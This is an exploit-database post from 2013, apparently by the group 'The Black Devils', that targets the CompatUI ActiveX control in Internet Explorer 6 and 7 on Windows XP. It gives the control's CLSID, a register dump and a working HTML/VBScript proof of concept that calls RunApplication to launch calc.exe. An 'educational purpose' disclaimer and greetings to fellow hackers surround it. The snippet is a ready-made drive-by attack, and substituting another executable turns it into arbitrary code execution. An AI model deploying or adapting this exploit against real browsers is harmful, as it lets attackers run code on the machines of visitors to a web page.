|
</================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm The Black Devils member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: CompatUI ActiveX Control <= Remote Command Execution
# Date: 26/02/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ remote ]
# Dork : [ n / a ]
# Type : Windows
# Tested on: Internet Explorer 6 + 7 on Win Xp SP2
# Special Thanks to Ness Oum El Bouaghi
</==========================>
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
/=============================/>
File: C:\WINDOWS\system32\compatui.dll
CLSID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
ProgID: COMPATUILib.ProgView
Class Util
GUID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
Number of Interfaces: 1
Default Interface: IUtil
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
/==========> Regisers
EAX 00000000
ECX BBEF9920
EDX 00000083
EBX 00000000
ESP 0012D180
EBP 0012D1A0
ESI 0012D1BC
EDI 00000000
EIP 7C91EB94 ntdll.KiFastSystemCallRet
C 0 ES 81A6 32bit 0(0)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 9920 32bit 0(0)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 81A1 32bit 0(0)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -5.6808232650904289540e-3484
ST1 empty -UNORM 9654 00000000 F0499644
ST2 empty -UNORM C0FD 00000000 0012D6D8
ST3 empty 0.0000000146950918570e-4933
ST4 empty -UNORM 9644 00000000 00000000
ST5 empty -1.2922186488787218470e+2437
ST6 empty -1.3850745354512915700e+4024
ST7 empty -UNORM 9644 00000000 00000083
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
/ =========> Proof Of Concept
------------------------------
<object classid='clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8' id='compatUI'></object>
<script language='vbscript'>
compatUI.RunApplication 1, "calc.exe", 1
</script>
/ ===========>
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
| Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
| Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES | Khalil Zhani
| All Dz hackerz
/ =========> Contact
-------------------------------
Contact:
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
========================/>
|
推荐
评论(0条)
